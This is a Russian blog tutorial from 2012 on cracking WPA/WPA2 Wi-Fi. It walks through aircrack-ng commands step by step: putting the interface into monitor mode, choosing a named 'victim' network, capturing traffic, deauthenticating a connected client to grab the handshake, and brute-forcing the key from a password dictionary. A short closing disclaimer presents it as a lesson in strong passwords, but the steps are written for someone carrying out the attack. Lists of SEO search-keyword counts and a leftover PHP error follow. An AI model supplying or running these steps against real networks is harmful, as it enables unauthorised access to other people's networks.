Взлом Wi-Fi (WPA / WPA2)

Автор: Администратор
Дата публикации: 8 мая 2012 года
Раздел: Защита от взлома

Материалы к статье можно найти на странице - Программы, словари и полезные материалы по взлому Wi-Fi

И снова лирика. Перед прочтением данной статьи Вам следует убедиться, что Вы знаете что такое Linux (если быть точнее, то Ubuntu Linux любой версии), терминал или командная строка, ну и конечно пакет программ Aircrack-ng. Ну как? Убедились? Если да, то никаких вопросов при прочтении данной статьи возникнуть у вас не должно. Итак начнем осуществлять взлом Wi-Fi с шифрованием WPA / WPA2.

Взлом Wi-Fi с шифрованием WPA / WPA2 – ШАГ 1:

Первое, что необходимо сделать, это зайти в терминал и набрать в нем следующую команду: sudo ifconfig.

После выполнения данной команды вы увидите на экране примерно тоже самое, что показано на скриншоте ниже:

Взлом Wi-Fi с шифрованием WPA / WPA2

В нашем случае видим 4 интерфейса, в Вашем может быть больше, ну или меньше. Нас интересует беспроводной интерфейс wlan0, с ним мы и предполагаем далее работать.

Взлом Wi-Fi с шифрованием WPA / WPA2 – ШАГ 2:

После выбора беспроводного интерфейса, необходимо перевести его в пассивный режим. Для выполнения данной операции набираем в терминале команду: sudo airmon-ng start wlan0.

Результат выполнения данной команды Вы можете увидеть на скриншоте ниже:

Взлом Wi-Fi с шифрованием WPA / WPA2

Взлом Wi-Fi с шифрованием WPA / WPA2 – ШАГ 3:

Теперь снова набирем команду sudo ifconfig и видим, что у нас появился интерфейс mon0. Это отлично, значит можно продолжить.

Взлом Wi-Fi с шифрованием WPA / WPA2

Взлом Wi-Fi с шифрованием WPA / WPA2 – ШАГ 4:

Проведем мониторинг сети, для того чтобы выбрать жертву для атаки. Для этого наберем в терминале команду: sudo airodump-ng mon0.

Результат выполнения показан на скриншоте ниже:

Взлом Wi-Fi с шифрованием WPA / WPA2

Проанализировав полученные данные видим, что сеть ASU_BTD имеет протокол шифровнаия WPA2 и к ней подключен клиент. Ее мы и будем взламывать.

Взлом Wi-Fi с шифрованием WPA / WPA2 – ШАГ 5:

Теперь набираем в терминале следующую команду:

sudo airodump-ng mon0 --bssid 00:26:5A:6D:C8:B6 -w wpa2.

Результат показан на скриншоте ниже:

Взлом Wi-Fi с шифрованием WPA / WPA2

В результате выполнения этой команды идет перехват пакетов между точкой доступа и станцией. Замечание: свойство --ivs, которое используется при взломе Wi-Fi с протоколом шифрования WEP вводить не надо, иначе будут перехвачены только вектора инициализации и произвести взлом будет невозможно.

Взлом Wi-Fi с шифрованием WPA / WPA2 – ШАГ 6:

Теперь открываем еще один терминал, запущенный ранее терминал закрывать нельзя, и набираем следующую команду:

sudo aireplay-ng mon0 -0 100 -a 00:26:5A:6D:C8:B6 -c 00:24:2C:13:9E:49.

Тем самым посылая беспроводному клиенту сообщение о том, что он больше не ассоциирован с точкой доступа. Клиент попытается установить соединение заново и пошлет именно те пакеты (WPA handshake), которые нам нужны для взлома сети Wi-Fi. Результат отображен ниже:

Взлом Wi-Fi с шифрованием WPA / WPA2

Взлом Wi-Fi с шифрованием WPA / WPA2 – ШАГ 7:

Теперь можно все закрыть, открыть новый терминал, положить поближе файл с перехваченными пакетами и с наиболее популярными паролями (второй можно скачать в сети) и набрать следующую команду:

sudo aircrack-ng -w password.txt -b 00:26:5A:6D:C8:B6 wpa2*.cap

Вот собственно и все поиск пароля будет выполняться в автоматическом режиме. Поскольку все что от Вас требовалось вы сделали, то процесс зависит только от качества словаря и мощности компьютера. Ах да, чуть не забыл, еще от того, насколько тупой пароль придумал хозяин точки доступа. Теперь можно спокойно пойти попить чай и подождать появления чего-то типа: KEY FOUND [Так сильно нужный Вам пароль].

Взлом Wi-Fi с шифрованием WPA / WPA2

Примечание! Обратите внимание! Еще раз напоминаю, данная статья написана не для того чтобы Вы брали ноги в руки и бежали взламывать своего соседа ради халявного интернета или какой-нибцдь информации, а ради того чтобы Вы наконец-то выучили все симвоы на клавиатуре и научились создавать безопасные пароли. P.S. А не только [11111111] или [qwertyui].



ТОП 15 http://wordstat.yandex.ru/ по запросу "взлом wifi"

  • взлом wifi (17374);
  • программа для взлома wifi (4316);
  • взлом wifi сети (2175);
  • взлом пароля wifi (1985);
  • скачать взлом wifi (1600);
  • скачать программу для взлома wifi (1019);
  • взлом wifi android (920);
  • взлом wifi андроид (897);
  • программа для взлома паролей wifi (725);
  • программа для взлома wifi сетей (615);
  • взлом wifi скачать бесплатно (523);
  • взлом wifi wpa (518);
  • взлом через wifi (484);
  • программа для взлома wifi бесплатно (431);
  • взлом wifi windows (377).


ТОП 15 http://wordstat.yandex.ru/ по запросу "взлом wpa"

  • взлом wpa (3873);
  • взлом wpa psk (529);
  • взлом wifi wpa (518);
  • взлом wi fi wpa (328);
  • программа +для взлома wpa (244);
  • взлом wpa сетей (242);
  • словарь +для взлома wpa (241);
  • взлом wpa ключа (191);
  • взлом wpa wpa2 (189);
  • взлом wpa скачать (165);
  • взлом wpa windows (148);
  • взлом пароля wpa (125);
  • взлом wpa 2 (121);
  • взлом wpa backtrack (110);
  • взлом wep wpa (96).


ТОП 15 http://wordstat.yandex.ru/ по запросу "взлом wep"

  • взлом wep (1892);
  • взлом wifi wep (236);
  • взлом wep ключа (157);
  • взлом wi fi wep (156);
  • программа +для взлома wep (149);
  • взлом wep backtrack (136);
  • взлом wep сети (98);
  • взлом wep wpa (96);
  • взлом шифрования wep (76);
  • взлом wep backtrack 5 (69);
  • wep взлом aircrack (65);
  • взлом wep пароля (57);
  • взлом wep windows (54);
  • взлом wep скачать (54);
  • wep взлом commview (44).
Fatal error: Call to a member function return_links() on a non-object in /var/www/zoleg9992/data/www/e2epro.com/page/footer.php on line 42